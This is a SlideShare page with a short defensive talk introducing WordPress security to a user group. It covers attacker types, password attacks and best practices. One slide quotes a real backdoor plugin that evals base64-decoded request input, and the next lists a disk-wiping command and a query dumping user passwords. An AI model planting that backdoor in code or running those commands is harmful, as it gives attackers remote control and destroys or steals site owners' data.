Intro to Wordpress Security

460 views
390 views

Published on

A brief overview of security concepts to give context to the threats facing Wordpress users.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
460
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Intro to Wordpress Security

  1. 1. Intro to WordpressSecurityPrepared for the Oklahoma City Wordpress User Groupby Chris Dodds
  2. 2. Chris Dodds Owner & Principal Advisor at Focusfire IT Strategy & Consulting Features: Ten+ years of experience across multiple industries and IT disciplines.Certifications:CISSP System Requirements: Food, water, &MCITP:SA internet connectivity.Security+Network+
  3. 3. This talk is not about thetop 5 WP security threats.
  4. 4. Let’s talk aboutBetty.
  5. 5. Betty’s Fancy Blog o’ GnomesBetty’s Betty’s Fancy Betty’s FancyFancy Server Employer Audience
  6. 6. It’s not about you, Betty.
  7. 7. The Players Script kiddies Hacktivists Pro Criminals Information Warriors
  8. 8. Enumeration AccessExploitation
  9. 9. Password AttacksExploit weak passwordsDictionary basedCan be entirely automated
  10. 10. ToolsPack Plugin toolspack.php <?php /* Plugin  Name:  ToolsPack Description:  Supercharge  your  WordPress  site  with  powerful  features   previously  only  available  to  WordPress.com  users.  core  release.  Keep  the   plugin  updated! Version:  1.2 Author:  Mark  Stain Author  URI:  http://checkWPTools.com/ */ $_REQUEST[e]  ?  EVAL(  base64_decode(  $_REQUEST[e]  )  )  :  exit; ?>Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
  11. 11. This backdoor code allows theremote user to:Execute commands on you server$WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;Execute commands against your WP databaseSELECT login + - + password FROM users
  12. 12. More Likely...Payload - keylogger, trojan, spyware, virusSEO Spam - links, keywords “garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon”
  13. 13. Best Practices Update! Update! Update! Backup & test your backups. Use a unique passphrase. Don’t use the “admin” user. Disable or delete un-used plugins.
  14. 14. These are all things yourattacker will do once theycontrol your site.
  15. 15. Recommended PluginsBackupBackWPup - open-source or BackupBuddy - commercialSecurityBetter WP Security - open-sourceLimit Login Attempts - open-sourceSucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
  16. 16. Contact and Q&AChris Doddse-mail - chris.dodds@focusfire.nettwitter - @doddschrisweb - chrisdodds.net

×